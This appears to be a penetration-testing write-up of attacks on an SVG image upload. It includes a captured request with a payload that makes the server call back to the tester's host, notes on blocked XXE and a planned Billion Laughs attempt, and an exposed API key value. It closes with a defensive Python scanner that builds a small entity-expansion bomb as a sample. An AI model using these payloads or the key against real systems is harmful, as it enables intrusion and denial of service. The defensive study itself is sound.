POST /upload HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 1313
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://redacted.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN
Referer: https://redacted.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="timestamp"

1551244304
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="api_key"

413781391468673
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image xlink:href="http://myserver:1337/" />
</svg>

Incoming request at my server: interestingly, the Referer header shows that the request was generated from the application's internal network, which hosts the app on port 3000.

Since the application accepts SVG images, the second try was to include static (internal) entities to see whether the parser allows custom entities at all.

As the parser allowed static entities, the next step was to include SYSTEM entities together with a DTD reference, so that the backend would fetch a malicious external DTD; this is essentially an XXE attack. The parser, however, blocked SYSTEM entities on the backend: they had strong validation against malformed and malicious XML.

Since the parser blocks SYSTEM entities, the attack surface is limited, so the next test was the Billion Laughs attack, because the application allowed static entities. Always note: before blindly fuzzing with various XML payloads, make sure you understand the parser logic. Before trying the Billion Laughs attack, I sent the server a simple entity-reference test to see whether the parser would render the xml1 entity when it is referenced through the xml2 entity.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [
<!ENTITY xml1 "This is my first message">
<!ENTITY xml2 "&xml1;">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<text x="0" y="20" font-size="20">&xml2;</text>
</svg>
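As an added example (not code from the original post or the target application), here is a small upload-side inspector that catches the three behaviours probed above before the file reaches the renderer: internal entities and their total expansion (the xml1/xml2 probe and the Billion Laughs follow-up), SYSTEM or PUBLIC entities (the XXE attempt), and remote href references (the SVG fetch that called back to myserver:1337). The sample documents, the function names and the 10,000-character expansion limit are my own assumptions.

```python
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC|"[^"]*"|\'[^\']*\')', re.I)
ENTITY_REF = re.compile(r'&([\w.-]+);')
REMOTE_HREF = re.compile(r'(?:xlink:)?href\s*=\s*["\'](?:https?:|ftp:|file:|//)', re.I)

def expansion_size(name, entities, stack=()):
    """Size of the full expansion of &name;, computed arithmetically (cheap even for a bomb); None = recursive."""
    if name in stack:
        return None
    literal = entities.get(name)
    if literal is None:                  # undeclared entity: expands to nothing here
        return 0
    total = len(ENTITY_REF.sub('', literal))
    for ref in ENTITY_REF.findall(literal):
        sub = expansion_size(ref, entities, stack + (name,))
        if sub is None:
            return None
        total += sub
    return total

def inspect_svg(xml_text, max_expansion=10_000):
    """Scan an upload before any XML parser sees it; an empty 'reasons' list means nothing suspicious."""
    reasons, entities = [], {}
    if re.search(r'<!DOCTYPE', xml_text, re.I):
        reasons.append('DOCTYPE present (internal subset can declare entities)')
    for param, name, value in ENTITY_DECL.findall(xml_text):
        if param or value.upper() in ('SYSTEM', 'PUBLIC'):
            reasons.append('external or parameter entity %s (XXE vector)' % name)
        else:
            entities[name] = value[1:-1]  # strip the surrounding quotes
    worst = 0
    for name in entities:
        size = expansion_size(name, entities)
        if size is None:
            reasons.append('recursive entity %s' % name)
        else:
            worst = max(worst, size)
    if worst > max_expansion:
        reasons.append('entity expansion of %d chars exceeds %d' % (worst, max_expansion))
    if REMOTE_HREF.search(xml_text):
        reasons.append('remote href (server-side fetch / SSRF vector)')
    return {'entities': entities, 'expansion': worst, 'reasons': reasons}

# Constructed samples: the post's xml1/xml2 probe and a four-level, fanout-10 expansion bomb.
ENTITY_PROBE = ('<?xml version="1.0"?><!DOCTYPE testingxxe [<!ENTITY xml1 "This is my first message">'
                '<!ENTITY xml2 "&xml1;">]><svg xmlns="http://www.w3.org/2000/svg"><text>&xml2;</text></svg>')
EXPANSION_BOMB = ('<!DOCTYPE svg [<!ENTITY lol0 "lol">'
                  + ''.join('<!ENTITY lol%d "%s">' % (i, ('&lol%d;' % (i - 1)) * 10) for i in range(1, 5))
                  + ']><svg xmlns="http://www.w3.org/2000/svg"><text>&lol4;</text></svg>')
```

Because the expansion is summed as integers rather than materialised, the check itself cannot be exhausted by the document it is inspecting, which is exactly why it belongs in front of the real parser.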